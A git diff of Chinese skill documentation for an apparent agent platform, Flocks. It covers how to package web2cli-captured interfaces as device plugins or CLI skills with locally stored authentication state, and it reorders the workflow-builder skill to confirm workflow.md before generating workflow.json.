+- `<name>` 用产品或系统的稳定标识，不用一次性任务名
+- 目录名可以带版本；`service_id` 要尽量稳定，避免和临时抓包任务绑定
+- Python 文件名统一用 `_`
+
+## 最小 `_provider.yaml`
+
+至少包含以下字段：
+
+```yaml
+name: Acme Portal
+vendor: acme_security
+service_id: acme_portal_device
+version: "1.0.0"
+integration_type: device
+description: >
+  Acme Portal WebCLI-backed device integration for alert listing and asset
+  detail queries. Configure Base URL and the required login state fields
+  separately in the credentials form.
+description_cn: >
+  Acme Portal 的 WebCLI 设备接入模板，支持告警列表和资产详情查询。
+  请在设备配置中分别填写 Base URL 与所需登录态字段。
+credential_fields:
+  - key: base_url
+    label: Base URL
+    storage: config
+    config_key: base_url
+    input_type: url
+    required: true
+  - key: auth_state_path
+    label: Auth State Path
+    storage: config
+    config_key: auth_state_path
+    input_type: text
+    default: "~/.flocks/browser/acme-portal/auth-state.json"
+  - key: username
+    label: Username
+    storage: config
+    config_key: username
+    input_type: text
+    required: false
+    description: 仅在 cookie 失效后需要 Agent 辅助登录刷新 state 时填写
+  - key: password
+    label: Password
+    storage: secret
+    config_key: password
+    secret_id: acme_portal_password
+    input_type: password
+    required: false
+    description: 仅在 cookie 失效后需要 Agent 辅助登录刷新 state 时填写
+  - key: cookie
+    label: Cookie
+    storage: secret
+    config_key: cookie
+    secret_id: acme_portal_cookie
+    input_type: password
+  - key: csrf_token
+    label: CSRF Token
+    storage: secret
+    config_key: csrf_token
+    secret_id: acme_portal_csrf_token
+    input_type: password
+defaults:
+  timeout: 30
+  category: custom
+notes: |
+  WebCLI 设备建议优先复用稳定隐藏接口，不建议把浏览器自动化作为默认运行时。
+  若返回 401/403、跳转登录页或 CSRF 失效，应先按认证失效处理。
+```
+
+注意：
+
+- 必须包含 `integration_type: device`
+- `description` 用英文，`description_cn` 用中文
+- 只把运行时真正需要用户填写的字段放进 `credential_fields`
+- 不要把真实 cookie、token、密码、auth state JSON 写进插件文件
+- 默认先放 `auth_state_path`，并指向 `~/.flocks/browser/<name>/auth-state.json`；不要添加 `auth_state_json` / `Legacy Auth State JSON`
+- 可以补充可选 `username` / `password`，但必须标注它们仅用于认证恢复或浏览器辅助登录，不得作为默认运行时认证入口
+- `cookie`、`csrf_token`、`access_token` 或特定认证头只有在实际站点需要时再补，并在 handler 中明确说明来源与刷新方式
+
+## 最小工具 YAML
+
+MVP 阶段推荐一个分组工具 + 多个 action：
+
+```yaml
+name: acme_portal_ops
+description: >
+  Acme Portal grouped device tool. Use the action parameter to query alerts,
+  assets, and other WebCLI-backed operations.
+description_cn: >
+  Acme Portal 分组设备工具。通过 action 参数调用告警、资产和其他 WebCLI 能力。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: acme_portal_device
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      enum: [list_alerts, get_asset_detail]
+      description: 统一业务动作名，不要暴露内部实现来源。
+    alert_id:
+      type: string
+      description: 查询资产详情时可选使用的关联标识。
+  required: [action]
+handler:
+  type: script
+  script_file: acme_portal.handler.py
+  function: handle
+```
+
+规则：
+
+- `provider` 必须与 `_provider.yaml.service_id` 一致
+- 高风险写操作必须设置 `requires_confirmation: true`
+- 对外 action 用统一业务语义，不要命名成 `webcli_get_alerts`、`api_get_alerts`
+
+## 最小 handler 结构
+
+MVP 阶段优先单文件 handler，不强制拆 client 模块：
+
+```python
+from __future__ import annotations
+
+from typing import Any
+
+from flocks.config.config_writer import ConfigWriter
+from flocks.tool.registry import ToolContext, ToolResult
+
+SERVICE_ID = "acme_portal_device"
+
+
+def _service_config() -> dict[str, Any]:
+    raw = ConfigWriter.get_api_service_raw(SERVICE_ID)
+    return raw if isinstance(raw, dict) else {}
+
+
+async def handle(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    cfg = _service_config()
+    if action == "list_alerts":
+        return ToolResult(success=True, output={"items": [], "source": "webcli_api"})
+    if action == "get_asset_detail":
+        return ToolResult(success=True, output={"item": None, "source": "webcli_api"})
+    return ToolResult(success=False, error=f"Unsupported action: {action}")
+```
+
+要求：
+
+- 通过 `ConfigWriter.get_api_service_raw(SERVICE_ID)` 读取当前设备实例配置
+- handler 内部负责认证头构造、分页、超时、重试和响应归一化
+- handler 默认只读取 `auth_state_path` 指向的 `auth-state.json`；如果文件缺失、不是合法 JSON，或没有匹配当前 Base URL 的 Cookie，应返回明确错误并提示重新登录/保存 state
+- handler 不要 fallback 到内联 `auth_state_json`；这会把路径字符串、占位文本或过期内容误当 JSON 解析，导致设备测试报错不清晰
+- 如果模板提供了 `username` / `password`，handler 也不要在普通 tool 调用里静默自动登录；这些字段只用于后续由 Rex 进入浏览器认证恢复流程时辅助填表
+- CLI 可选保留，但不要让设备运行时通过 subprocess 调 CLI
+
+## 组合 API / WebCLI / 处理逻辑
+
+同一设备可以混合多种能力来源，但对外仍然是统一 action：
+
+- `api`：正式 API，可直接调用
+- `webcli_api`：WebCLI 抓到的隐藏接口
+- `process`：本地字段归一化、过滤、聚合、补全
+- `composed`：先调一种来源，再补另一种来源，最后统一输出
+
+推荐选择顺序：
+
+1. 正式 API 稳定可用时，优先正式 API
+2. 正式 API 缺能力但 WebCLI 接口稳定时，用 `webcli_api`
+3. 需要字段清洗、补全、排序、聚合时，在 handler 内增加 `process`
+4. 需要多个来源补齐同一业务结果时，用 `composed`
+5. 必须验证码、强动态页面或人工交互时，只记录为 browser fallback，不放进默认设备运行时
+6. 如果某个隐藏接口依赖 `Authorization`、`Tdp-Authentication`、CSRF 等临时头，只有在 handler 已实现可靠的恢复/刷新逻辑时才暴露为默认 action；否则保留在 CLI 或文档中，不放进设备默认动作
+
+示例 action 映射：
+
+```yaml
+list_alerts: webcli_api
+get_asset_detail: composed
+list_users: api
+normalize_alert: process
+```
+
+这里的映射可以写进 handler 常量、注释、`notes` 或单独的设计文档，但不要把“来源类型”直接暴露给最终用户。
+
+## 认证失败处理
+
+出现以下情况时，优先按认证失效处理：
+
+- 返回 `401` 或 `403`
+- 返回内容出现 `Unauthorized`、`login`、未登录、无权限
+- Cookie / CSRF / access token 明显过期
+- `auth_state_path` 已存在，但接口仍跳转登录页
+
+处理原则：
+
+1. 不要无限重试
+2. 优先返回明确的错误提示，引导 Rex 使用 `flocks browser` 并按对应 skill 的认证失败处理流程恢复登录态
+3. 如果设备已配置可选 `username` / `password`，Rex 可以在浏览器恢复流程中读取它们辅助登录；如遇验证码、MFA、短信码或人工确认，立即停下并让用户接管
+4. 登录成功后执行 `flocks browser state save <auth_state_path>` 更新 cookie/state 文件
+5. 如仍失败，再提示用户重新登录或更新设备配置中的认证字段
+6. 如果保留了 CLI，可用 CLI 做一次最小验证
+7. 验证通过后，再让用户回到设备页点击“刷新设备模板”
+
+## `_test.yaml` 建议
+
+如果该 WebCLI 设备已经有最小可验证动作，建议补一个 `_test.yaml`，至少覆盖：
+
+- 一个低风险读操作
+- 最小必填参数
+- 成功时的关键字段断言
+
+这样后续更新 handler 或认证逻辑时更容易回归验证。
+
+## 一句话原则
+
+`web2cli` 的抓包结果是中间产物；只有在“安全设备接入”场景下，才把它直接整理成标准 device 插件作为主实现（无需先生成独立 CLI 再额外封装），让设备页能识别、配置并调用。
diff --git a/.flocks/plugins/skills/web2cli/references/skill-integration.md b/.flocks/plugins/skills/web2cli/references/skill-integration.md
new file mode 100644
index 000000000..b0e9edc0c
--- /dev/null
+++ b/.flocks/plugins/skills/web2cli/references/skill-integration.md
@@ -0,0 +1,199 @@
+# Web2CLI 结果如何接入 Skill
+
+> 本文说明：`web2cli` 生成 CLI 或 device tool 后，怎样把能力沉淀成可长期维护的产品 skill。
+
+## 结论
+
+无论最终主实现是 CLI 还是 device tool，都必须创建或更新对应产品 skill。skill 是长期入口，负责记录触发条件、模式判断、浏览器经验、认证恢复、接口文档和回归方法。
+
+主实现二选一：
+
+- **CLI 主实现**：CLI 放入 skill 的 `scripts/`，skill 直接调用 CLI。
+- **device tool 主实现**：device plugin 放入 `tools/device/<plugin_id>/`，skill 不放独立 CLI 主实现，只记录 device tool 的使用、验证和认证恢复方式。
+
+## 命名约定
+
+- skill 目录：`$HOME/.flocks/plugins/skills/<name>-use/`
+- 默认认证状态：`~/.flocks/browser/<name>/auth-state.json`
+- `<name>` 使用产品或系统的稳定标识，不用一次性任务名
+- 目录名可以保留 `-`，例如 `tdp-use`
+- Python 文件名统一用 `_`
+
+不要把最终能力命名成 `export_data`、`test_capture`、`web2cli_demo` 这类临时任务名。
+
+## 共用 Skill 结构
+
+CLI 和 device tool 两种场景都必须保留这些文件：
+
+```text
+$HOME/.flocks/plugins/skills/<name>-use/
+├── SKILL.md
+└── references/
+    ├── browser-workflow.md
+    └── cli-reference.md
+```
+
+其中：
+
+- `SKILL.md`：定义触发条件、模式判断、主实现落点和退回浏览器的条件
+- `references/browser-workflow.md`：记录登录入口、保存 state、认证恢复、页面操作经验和重新抓包方法
+- `references/cli-reference.md`：记录 CLI 或 device tool 的能力、参数、输出字段、验证方式和回归方法
+
+`references/cli-reference.md` 是历史沿用的统一接口文档名。即使主实现是 device tool，也继续使用这个文件承载 device tool 的参数、输出和验证说明。
+
+## CLI 主实现的 Skill 集成
+
+如果第 8 步选择通用 CLI 作为主实现，skill 还必须包含：
+
+```text
+$HOME/.flocks/plugins/skills/<name>-use/
+└── scripts/
+    ├── <name>_cli.py
+    └── config.py
+```
+
+从临时抓包结果集成到 skill 时：
+
+```bash
+SKILL_ROOT="$HOME/.flocks/plugins/skills/<name>-use"
+
+mkdir -p "$SKILL_ROOT/scripts" "$SKILL_ROOT/references"
+mkdir -p "$HOME/.flocks/browser/<name>"
+
+cp "$CAPTURE_ROOT/<normalized_capture_name>_cli.py" \
+  "$SKILL_ROOT/scripts/<name>_cli.py"
+
+cp "$CAPTURE_ROOT/auth-state.json" \
+  "$HOME/.flocks/browser/<name>/auth-state.json"
+```
+
+随后补齐：
+
+1. 在 `scripts/config.py` 中把认证状态默认值指向 `~/.flocks/browser/<name>/auth-state.json`
+2. 在 `references/cli-reference.md` 中写清楚 CLI 参数、环境变量、输出字段和示例
+3. 在 `references/browser-workflow.md` 中写清楚浏览器登录、保存 state、认证恢复和重新抓包步骤
+4. 在 `SKILL.md` 中说明什么时候优先走 CLI，什么时候退回浏览器
+
+推荐的配置写法：
+
+```python
+import os
+from pathlib import Path
+
+AUTH_STATE_FILE = Path(
+    os.getenv(
+        "<NAME>_AUTH_STATE",
+        Path.home() / ".flocks" / "browser" / "<name>" / "auth-state.json",
+    )
+)
+```
+
+## Device Tool 主实现的 Skill 集成
+
+如果第 8 步选择 device plugin 作为主实现，skill 只放维护入口和文档，不放 `scripts/<name>_cli.py` 主实现。
+
+必须补齐：
+
+1. 在 `SKILL.md` 中说明当前能力最终落点是 `tools/device/<plugin_id>/`
+2. 在 `references/cli-reference.md` 中写清楚 device tool 的 action、参数、输出字段、验证方式和回归方法
+3. 在 `references/browser-workflow.md` 中写清楚浏览器登录、保存 state、认证恢复、重新抓包步骤和 device 配置依赖
+4. 将认证状态默认位置统一到 `~/.flocks/browser/<name>/auth-state.json`
+
+device 场景不要在 skill 的 `scripts/` 目录下放一份与 device tool 平行演进的 CLI 主实现。如确实需要 CLI 做调试或回归，只能放在 device plugin 目录下作为可选辅助文件，并在 `references/cli-reference.md` 明确它不是运行时主路径。
+
+## `SKILL.md` 要求
+
+`SKILL.md` 必须遵守 Flocks 的标准 skill 格式：
+
+- 文件开头必须是 YAML frontmatter，第一行必须为 `---`
+- frontmatter 至少包含 `name` 和 `description`
+- `name` 使用稳定的 skill 标识，推荐与目录名一致，例如 `<name>-use`
+- frontmatter 结束后，再写正文标题、触发条件、模式判断和使用说明
+
+最小模板示例：
+
+```md
+---
+name: test-use
+description: 用于查询 Test 平台数据，支持通过 CLI 或 device tool 快速查询，认证失效时退回浏览器模式。
+---
+
+# Test Use
+
+## 触发条件
+
+- 用户提到 Test 平台
+- 用户需要查询 Test 数据
+
+## 模式判断
+
+### CLI / Device Tool 模式（默认）
+
+- 适用于快速查询和批量读取数据
+
+### 浏览器模式
+
+- 适用于需要页面交互、导出、重新登录或重新抓包的场景
+```
+
+不要把 `SKILL.md` 直接写成普通 Markdown 文档，例如下面这种格式是无效的：
+
+```md
+# Test Use
+```
+
+## `browser-workflow.md` 写作指南
+
+推荐写入：
+
+- 固定的登录入口、首页、详情页、导出页 URL
+- 已确认的稳定登录方法
+- 认证失效识别与恢复步骤
+- 已验证的页面操作路径、等待条件、iframe、虚拟列表或 SPA 特征
+- 默认 state 路径，例如 `~/.flocks/browser/<name>/auth-state.json`
+- CLI / device tool 与浏览器的分工边界
+- web2cli 过程中的踩坑、注意事项
+
+不要写入：
+
+- cookie、token、密码、短信码、TOTP 等敏感信息
+- 一次性的 `@eN` ref、临时 tab id、临时 selector、像素坐标
+- 本次任务的操作流水账
+
+## 认证失败怎么处理
+
+CLI 或 device tool 调用出现以下情况时，优先按认证失效处理：
+
+- 返回 `401` 或 `403`
+- 返回内容出现 `Unauthorized`、`login`、未登录、无权限
+- `auth-state.json` 已存在，但请求仍然被重定向到登录页
+
+处理原则：
+
+1. 不要无限重试
+2. 请求用户重新通过浏览器登录
+3. 登录完成后，重新保存认证状态到默认路径
+4. 再重试一次 CLI 或 device tool
+
+默认认证文件路径固定为：
+
+```bash
+~/.flocks/browser/<name>/auth-state.json
+```
+
+保存方式示例：
+
+```bash
+mkdir -p "$HOME/.flocks/browser/<name>"
+flocks browser state save "$HOME/.flocks/browser/<name>/auth-state.json"
+```
+
+如果用户重新登录并保存 state 后仍然失败，再继续排查：
+
+- `BASE_URL` 是否写错
+- 当前账号是否确实有接口权限
+- 站点是否还有额外 header / token / csrf 依赖
+
+## 一句话原则
+
+`web2cli` 的临时抓包结果不是最终交付。最终要么沉淀为 skill `scripts/` 下的稳定 CLI，要么沉淀为 device plugin 下的 device tool；两种方式都必须配套产品 skill 文档入口和统一认证状态路径。
diff --git a/.flocks/plugins/skills/workflow-builder/SKILL.md b/.flocks/plugins/skills/workflow-builder/SKILL.md
index 36475ffcf..dfe3947c1 100644
--- a/.flocks/plugins/skills/workflow-builder/SKILL.md
+++ b/.flocks/plugins/skills/workflow-builder/SKILL.md
@@ -6,9 +6,11 @@ description: 根据自然语言描述生成 flocks 内置工作流（workflow.md
 
 # Workflow Builder
 
-分七个阶段构建工作流：**场景确认与流程设计** → **简化 JSON 预览循环** → **完整 workflow.md** → **完整 workflow.json** → **逐节点测试** → **集成测试** → **性能评估与优化**。
+创建模式按以下顺序构建工作流：**场景确认与流程设计** → **确认 workflow.md 文档语言** → **workflow.md 草稿与确认循环** → **workflow.json 生成与验证** → **逐节点测试** → **集成测试** → **性能评估与优化**。
 
 > **产物**：`workflow.json` 中所有可执行节点均为 `type="python"` 并自带 `code`。最终交付物固定为：`workflow.md`、`workflow.json`。
+>
+> **顺序强制**：创建工作流时，`workflow.md` 是唯一的人类意图源。必须先询问用户需要中文还是英文流程说明文档，再按所选语言创建并确认 `workflow.md`，最后基于已确认的 `workflow.md` 生成 `workflow.json`。在 `workflow.md` 写入并确认前，严禁写入或覆盖 `workflow.json`。
 
 ## 参考资料（按需读取）
 
@@ -16,6 +18,10 @@ description: 根据自然语言描述生成 flocks 内置工作流（workflow.md
 |------|------|---------|
 | [references/reference.md](references/reference.md) | 节点类型详解、出边选择行为、分支/循环/Join 规则、Edge Mapping 指南、Tool vs LLM 决策、文件输出规则、报告生成模板、`workflow.json` 骨架模板 | **生成 `workflow.json` 前建议读取** |
 | [references/composition.md](references/composition.md) | 嵌套工作流（subworkflow）组合格式与展开规则 | 仅在用户需要嵌套工作流时读取 |
+| [references/workflow_zh.md](references/workflow_zh.md) | 中文 `workflow.md` 结构模板 | 用户选择中文流程说明文档时读取 |
+| [references/workflow_en.md](references/workflow_en.md) | English `workflow.md` structure template | 用户选择英文流程说明文档时读取 |
+| [references/workflow_template/](references/workflow_template/) | 工作流创建参考包，包含标准 `workflow.md`、`workflow.json`、`config.json`、`guide.md` 和 `meta.json` 模板 | **创建工作流、生成配置模板或补齐 guide.md 前按需读取** |
+| `~/.flocks/plugins/workflows/stream_alert_denoise/workflow.md` | 已成型业务工作流示例，展示“功能、流程、输入输出、模块逻辑、发布配置、编辑指南”的写法 | 文件存在且需要参考真实工作流表达时读取 |
 
 ---
 
@@ -30,15 +36,15 @@ description: 根据自然语言描述生成 flocks 内置工作流（workflow.md
 [ ] 1.   场景深度确认：与用户对话，明确业务场景与核心目标
 [ ] 1.   输出思考维度分析 + Mermaid 流程简图，与用户沟通对齐
 [ ] 1.   获取样例数据（用户上传或自动构造后确认）
-[ ] 2.   生成简化版预览 JSON（仅节点名称+描述，无代码）
-[ ] 2.   写入简化 workflow.json 文件，供页面展示流程图
-[ ] 2.   向用户展示并收集修改建议（循环直至满意）
-[ ] 3.   生成完整 workflow.md（人读描述）
-[ ] 3.   写入 workflow.md 文件
-[ ] 3.   向用户展示流程摘要并请求确认
-[ ] 4.   读取 reference.md
-[ ] 4.   生成完整 workflow.json（含代码）
-[ ] 4.   写入 workflow.json 文件
+[ ] 2.   用 Question 工具确认 workflow.md 使用中文还是英文
+[ ] 2.   读取对应语言模板 workflow_zh.md 或 workflow_en.md，以及可用业务示例
+[ ] 2.   生成单份 workflow.md 草稿（人读描述，包含功能、流程、节点、输入输出、处理逻辑）
+[ ] 2.   写入 workflow.md 文件，供页面编辑器展示
+[ ] 2.   向用户展示流程摘要并收集修改建议（循环直至满意）
+[ ] 2.   确认 workflow.md 已是最新意图源
+[ ] 3.   读取 reference.md
+[ ] 3.   基于已确认 workflow.md 生成完整 workflow.json（含代码）
+[ ] 3.   写入 workflow.json 文件
 [ ] 4.   验证 JSON 格式 + Python 语法
 [ ] 4.   保存样例数据到 /api/workflow/{id}/sample-inputs
 [ ] 5.   逐节点测试：节点 1 - <node_id>
@@ -131,125 +137,84 @@ flowchart TD
 
 ---
 
-## 2. 第二阶段：简化版 JSON 预览与确认循环
-
-> 目标：在投入完整代码编写之前，让用户在页面上直观地看到流程图，并就节点/边的设计提出修改建议。
-
-### 2.1 生成简化版 workflow.json
-
-生成一份**只有结构、没有代码**的简化 JSON 文件：
-
-- 每个节点使用 `type="logic"`（只需 `description`，无需 `code`）
-- 包含节点的 `id`、`name`（可读名称）、`description`（功能说明）
-- 包含完整的 `edges`（`from`、`to`、`label`）
-- **不包含任何 Python 代码**
-
-简化 JSON 最小结构示例：
-
-```json
-{
-  "id": "alert_triage",
-  "name": "告警分级调查",
-  "description": "自动化 NDR 告警调查工作流",
-  "start": "receive_alert",
-  "nodes": [
-    {
-      "id": "receive_alert",
-      "type": "logic",
-      "name": "接收告警",
-      "description": "接收输入告警，提取 IP、端口、协议等关键字段"
-    },
-    {
-      "id": "check_ip_type",
-      "type": "branch",
-      "name": "判断 IP 类型",
-      "description": "判断源 IP 是内网地址还是外网地址，分支处理"
-    },
-    {
-      "id": "query_threat_intel",
-      "type": "logic",
-      "name": "查询威胁情报",
-      "description": "调用威胁情报工具查询外部 IP 的恶意评分、标签"
-    },
-    {
-      "id": "generate_report",
-      "type": "logic",
-      "name": "生成分析报告",
-      "description": "汇总所有上下文，由 LLM 生成结构化调查报告"
-    }
-  ],
-  "edges": [
-    { "from": "receive_alert", "to": "check_ip_type", "order": 0 },
-    { "from": "check_ip_type", "to": "query_threat_intel", "label": "外网", "order": 0 },
-    { "from": "query_threat_intel", "to": "generate_report", "order": 0 }
-  ]
-}
-```
+## 2. 第二阶段：生成并确认 workflow.md（人读意图源）
 
-### 2.2 写入文件并展示
+> 目标：先把工作流的业务意图、节点结构、输入输出和处理逻辑写成可读、可编辑的 `workflow.md`。页面左侧编辑器以 `workflow.md` 表达工作流，用户应先在这里确认意图；只有确认后才能生成 `workflow.json`。
 
-1. 将简化 JSON 写入规范目录下的 `workflow.json`（**必须使用绝对路径**，见第 9 节）：用户级为 `~/.flocks/plugins/workflows/<id>/`，项目级为 `<workspace>/.flocks/plugins/workflows/<id>/`
-2. 在消息中告知用户：「已更新流程图，请在工作流页面查看。对节点名称、描述或流程结构有什么修改建议？」
+### 2.0 文档语言选择（必须）
 
-### 2.3 用户反馈循环（循环直至满意）
+创建 `workflow.md` 前，必须用 `Question` 工具询问用户需要哪种流程说明文档：
 
-收集用户的修改建议，按照以下循环执行，**直到用户确认满意**：
+- 中文流程说明文档：读取 [references/workflow_zh.md](references/workflow_zh.md)，并可参考 [references/workflow_template/workflow.md](references/workflow_template/workflow.md) 的章节完整性，生成中文 `workflow.md`。
+- English workflow specification：读取 [references/workflow_en.md](references/workflow_en.md)，并可参考 [references/workflow_template/workflow.md](references/workflow_template/workflow.md) 的章节完整性，生成英文 `workflow.md`。
 
-```
-接收用户反馈
-  ↓
-分析修改需求（增/删节点、改描述、调整边关系）
-  ↓
-更新简化 JSON
-  ↓
-重新写入文件
-  ↓
-向用户展示更新摘要，询问是否满意
-  ↓
-[满意] → 进入第三阶段
-[还有修改] → 重新循环
-```
-
-> **提示**：前端检测到 `workflow.json` 更新后会自动刷新流程图，用户无需手动刷新。
-
----
-
-## 3. 第三阶段：生成完整 workflow.md（人读描述）
+规则：
 
-> 以第一阶段确认的流程结构为基础，生成**操作手册级别**的详细流程文档。
+- 工作流目录里最终只写一份 `workflow.md`。
+- 不要在工作流目录里创建 `workflow_zh.md`、`workflow_en.md`、`workflow.en.md` 或其它语言副本。
+- `workflow_zh.md` / `workflow_en.md` 只是本 skill 内部的结构模板。
+- `references/workflow_template/` 只是本 skill 内部的创建参考包，严禁复制成可扫描的 `workflow_template` 工作流目录；需要模板内容时，只读取其中的文件并改造成当前真实工作流。
+- 不要根据用户当前会话语言自动猜测文档语言；创建 `workflow.md` 前必须明确询问并得到选择。
 
-### 核心要求
+### 2.1 核心要求
 
-每个步骤必须包含：
+`workflow.md` 必须让人读得懂，也必须足够结构化，便于后续稳定生成 `workflow.json`。文档必须覆盖以下内容，涉及具体节点的条目需逐节点写清：
 
+- **功能概述**：用人能理解的话说明这个工作流解决什么问题、不解决什么问题。
+- **总体流程**：用箭头、表格或 Mermaid 描述节点顺序和职责。
 - **输入/输出**：数据来源、格式、用途。
-- **处理逻辑**：具体操作步骤、判定条件、循环方式、异常处理。
+- **模块逻辑**：每个节点的职责、处理步骤、判定条件、循环方式、异常处理。
 - **工具/LLM 标注**：明确该步是 Tool-driven 还是 LLM-driven（详细决策指南见 [reference.md § Tool vs LLM](references/reference.md#5-tool-vs-llm-决策指南)）。
   - **推荐组合**：`tool.run_safe(...)` 获取数据 → `llm.ask(...)` 分析 → `tool.run('write', ...)` 落盘。
   - **默认使用 `tool.run_safe()`**，返回 `{"success", "text", "obj", "error"}` 统一包络。
 - **文件落盘**：节点有任何文件输出时，统一写入 `~/.flocks/workspace/outputs/<YYYY-MM-DD>/` 目录下，详见 [reference.md § 文件输出规则](references/reference.md#6-文件输出规则)。
 - **决策分支**：写清条件、各分支处理、跳转规则。
+- **发布和配置**：写清是否支持 API、Syslog、Kafka、Webhook、Schedule 等入口，并说明运行态配置由 `config.json` 模板和 Storage/SQL 管理。
+- **编辑指南**：告诉用户修改输入、节点逻辑、输出、发布方式时应该优先改哪里。
 - **报告结构**（若涉及）：除非用户要求简化，需包含摘要、分析、发现、建议、来源（模板见 [reference.md § 报告生成](references/reference.md#7-报告生成最佳实践)）。
 
-### ⚠️ 两步交付
+### 2.2 写入 workflow.md
 
-1. 先用 `write` 工具将 `workflow.md` **写入文件**（路径与第 9 节一致，例如 `.../plugins/workflows/<id>/workflow.md`）。
+1. 先按用户选择的语言模板生成内容，再用 `write` 工具将单份 `workflow.md` **写入文件**（路径与第 9 节一致，例如 `.../plugins/workflows/<id>/workflow.md`）。
    - **⚠️ 路径必须使用绝对路径**：全局目录可用 `python3 -c "import os; print(os.path.expanduser('~/.flocks/plugins/workflows/<id>'))"`；项目目录可先解析 workspace（从 cwd 向上第一个含 `.flocks` 的目录）再拼接 `/.flocks/plugins/workflows/<id>`。
    - **严禁**使用未展开的相对路径（如 `.flocks/plugins/workflows/<id>/` 相对仓库根随手写入错误位置），否则 WebUI 可能无法从实际扫描目录读到文件。
-2. 写入成功后，用 `Question` 工具向用户展示流程摘要并请求确认（"确认工作流" / "修改工作流"）。确认后进入第四阶段生成 `workflow.json`。
+   - **严禁**同时写入 `workflow.en.md` 或语言副本；UI 和生成流程只认当前工作流目录下的 `workflow.md`。
+2. 写入成功后，在消息中说明：「已创建 `workflow.md`，请在左侧编辑器查看并确认。需要调整节点、输入输出或处理逻辑时，请先改 `workflow.md`。」
+3. 需要用户确认是否进入 `workflow.json` 生成时，必须使用 `Question` 工具或等待页面 diff 的接受/拒绝结果；不要用普通文本提问替代确认。
+
+### 2.3 用户反馈循环（循环直至满意）
+
+收集用户对 `workflow.md` 的修改建议，按照以下循环执行，**直到用户确认满意**：
+
+```
+接收用户反馈
+  ↓
+分析修改需求（功能描述、节点职责、输入输出、处理逻辑、分支关系）
+  ↓
+更新 workflow.md
+  ↓
+重新写入文件
+  ↓
+向用户展示更新摘要，并用 Question 工具或页面 diff 请用户确认
+  ↓
+[满意] → 进入第三阶段，基于已确认 workflow.md 生成 workflow.json
+[还有修改] → 继续循环
+```
+
+> **禁止事项**：不要为了提前展示流程图而先写一个简化 `workflow.json`。当前创建流程必须让 `workflow.md` 先落盘并完成确认，`workflow.json` 只能作为已确认 `workflow.md` 的机器执行产物。
 
 ---
 
-## 4. 第四阶段：生成完整 workflow.json（机器执行）
+## 3. 第三阶段：生成完整 workflow.json（机器执行）
 
-根据 `workflow.md` 生成严格可执行的 `workflow.json`。**生成前建议读取 [references/reference.md](references/reference.md)**。
+根据已确认的 `workflow.md` 生成严格可执行的 `workflow.json`。**生成前必须读取磁盘上最新的 `workflow.md`，并建议同时读取 [references/reference.md](references/reference.md)**。
 
-### 4.0 节点生成策略
+### 3.0 节点生成策略
 
 - **主路径**：每个可执行步骤 → `type="python"` 节点，必须同时包含 `code`（执行逻辑）+ `description`（文档说明）。
 - **兜底**：`logic` 节点仅在用户明确要求"不写代码"或快速原型时使用，运行时由 codegen 兜底。
 
-### 4.1 运行时硬约束
+### 3.1 运行时硬约束
 
 **顶层字段：**
 
@@ -273,7 +238,7 @@ flowchart TD
 
 - JSON 中用 `"from"` 而非 `"from_"`；`from`/`to` 引用存在的 node id；`order` ≥ 0。
 
-### 4.2 映射规则
+### 3.2 映射规则
 
 - `workflow.md` 每步对应一个节点，`id` 用 snake_case。
 - md 中写的输出字段，必须在 `outputs[...]` 中体现。
@@ -281,7 +246,7 @@ flowchart TD
 - 下游节点如需 `tool.run(..., **inputs)`，用 `edge.mapping`/`edge.const` 规整输入到匹配工具参数形状。
 - 详细 Mapping 指南见 [reference.md § Edge Mapping](references/reference.md#4-edge-mapping-详细指南)。
 
-### 4.3 分支/循环与 Join
+### 3.3 分支/循环与 Join
 
 - **branch/loop 选边**：`bool` 值 label 用 `"true"`/`"false"`；`str` 值精确匹配；无命中回退到空 label 默认边。上游必须把 `select_key` 所需字段写入 payload。
 - **分支汇合（强制）**：
@@ -291,7 +256,7 @@ flowchart TD
   - 推荐模式：join 节点（python, `join=true`）归一化多分支输出 → 再传给后续步骤
 - **嵌套工作流**：见 [references/composition.md](references/composition.md)。
 
-### 4.4 代码实现
+### 3.4 代码实现
 
 **辅助函数：**
 
@@ -347,7 +312,20 @@ elif isinstance(obj, str):
 - **文件输出**：有文件输出时写入 `~/.flocks/workspace/outputs/<YYYY-MM-DD>/`（详见全局文件输出约定）
 - **数据传递**：`inputs` 和 `outputs` 字典，运行时浅合并 `payload = {**inputs, **outputs}`
 
-> **⚠️** 生成后必须使用 `write` 写入到文件，并验证：1) `json.load` 确认 JSON 格式正确；2) 对每个 `type="python"` 节点的 `code` 执行 `compile(code, "<node_id>", "exec")` 确认 Python 语法正确。若语法报错，修复后重新写入。
+> **⚠️** 生成后必须使用 `write` 写入到文件。写入完成后进入第四阶段验证，验证通过前不得进入逐节点测试。
+
+---
+
+## 4. 第四阶段：验证 workflow.json 与保存样例
+
+`workflow.json` 写入后必须完成以下验证与准备工作：
+
+1. 用 `json.load` 确认 JSON 格式正确。
+2. 对每个 `type="python"` 节点的 `code` 执行 `compile(code, "<node_id>", "exec")` 确认 Python 语法正确。
+3. 若格式或语法报错，修复后重新写入 `workflow.json` 并再次验证。
+4. 通过 `POST /api/workflow/{id}/sample-inputs` 保存第一阶段收集的样例数据，请求 body 为 `{ "sampleInputs": <样例 JSON 对象> }`。
+
+只有以上步骤全部通过后，才能进入第五阶段逐节点测试。
 
 ---
 
@@ -523,7 +501,7 @@ Body: { "inputs": <样例数据> }
 - **单节点改动** → 使用 `edit` 工具精准替换目标字段
 - **多节点改动 / 结构重组** → 整体覆写
 
-**遵守所有 workflow.json 约束**（见第 4 节规范）。
+**遵守所有 workflow.json 约束**（见第 3 节规范）。
 
 ### 8.4 验证与写回
 
@@ -607,27 +585,11 @@ python3 -c "from pathlib import Path; p=Path.cwd(); ws=next((x for x in [p,*p.pa
 
 ---
 
-## workflow.md 标准模板
-
-```markdown
-# [Workflow Name]
+## workflow.md 模板资源
 
-## 业务场景
-[目标和背景]
+本 skill 内置两份流程说明文档模板：
 
-## 流程步骤
+- 中文模板：[references/workflow_zh.md](references/workflow_zh.md)
+- English template: [references/workflow_en.md](references/workflow_en.md)
 
-### 1. [步骤名称]
-- **描述**: [操作手册级别描述]
-- **工具/模型**: [Tool: xxx / LLM: xxx]
-- **输入**: [字段名: 来源和格式]
-- **输出**: [字段名: 格式和用途]
-- **处理逻辑**:
-  - [操作步骤]
-  - [工具调用：`result = tool.run_safe('name', ...)`，用 `result["text"]` 取结果]
-- **决策分支**（如适用）:
-  - 条件 → 分支处理
-
-### 2. [步骤名称]
-...
-```
